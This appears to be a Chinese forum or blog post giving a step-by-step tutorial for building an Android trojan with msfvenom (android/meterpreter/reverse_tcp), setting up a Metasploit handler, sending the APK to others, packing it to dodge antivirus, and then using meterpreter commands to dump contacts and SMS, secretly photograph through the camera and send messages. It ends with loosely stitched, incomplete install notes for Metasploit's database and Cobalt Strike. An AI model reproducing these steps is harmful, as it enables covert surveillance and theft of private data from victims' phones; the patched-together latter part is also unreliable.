
现在我就来说说到底怎么用msf呢
有很多人说,他们不会安装msfconsole
教程:
http://bbs.huluxia.com/wap/thread/829605.html?para=37Hftt%2B137bfsd%2B037Xfst%2B03p%2FfuN%2By37nftt%2Bw37U%3D%0A&product=tool
安装了msfconsole之后,在termux输入:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=5555 R >/sdcard/mu.apk
其中
LHOST= 后面的数字是本地的ip,不是被攻击者的ip而是你自己的
LPORT= 是端口,高端口不容易被报毒,如果你不知道端口是什么那就不要改了
生成的木马在根目录的mu.apk(啰嗦)
那么接下来,我来教大家怎么监听吧
1.启动msfconsole(漫长):msfconsole
2.使用multi模块:use exploit/multi/handler
3.设置LHOST(跟木马的一样):set LHOST 192.168.2.117
4.设置LPORT(一样的):set LPORT 5555
5.设置payload:set payload android/meterpreter/reverse_tcp
6.启动监听:exploit
最后将木马发给别人就行啦
很多人说一看就知道是木马了!
在这里我说一句,你不会加个壳嘛?
ok!当鱼上吊的时候,会反dshell
命令:
dump_contacts 导出电话
dump_sms 导出信息
webcam_list 列出摄像头
webcam_stream 开启摄像
webcam_snap 偷拍一张照片
webcam_chat 视频通话
ps 列出所有进程
activity_start 启动其它应用
check_root 检查是否root
send_sms 发送指定信息
全部手机进行,免root进行
你这个有很大的可能性是,没有连接metasploit,的数据库,或者该说你根本没有打开,这样的话连不上数据库,他就无法启动,可能你刚开始下载的时候还可以用,后来的时候就不能用了。建议你去再把它的数据库也给安上。
1. 环境及软件
2. 程序安装
旧版安装程序下载地址
https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version
1. 使用安装脚本安装MSF
以上下载文件为安装bash脚本,实际为检测配置安装环境,下载安装程序
2. 测试安装完成的MSF
安装完成的MSF目录为/opt/metasploit-framework/
执行msfconsole查看MSF是否正常
出现没有数据库支持警告,首先创建数据库连接配置文件
再次进行启动测试
这种情况一般是数据库服务没有启动或没有初始化
3. 初始化数据库
首先初始化数据库
以上过程完成后,msf再次启动测试正常,数据库连接正常
4. 启动CobaltStrike
上传CobaltStrike V2.5.zip到/root/目录,并解压
启动 cobaltstrike.jar 连接服务端
连接效果如下
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)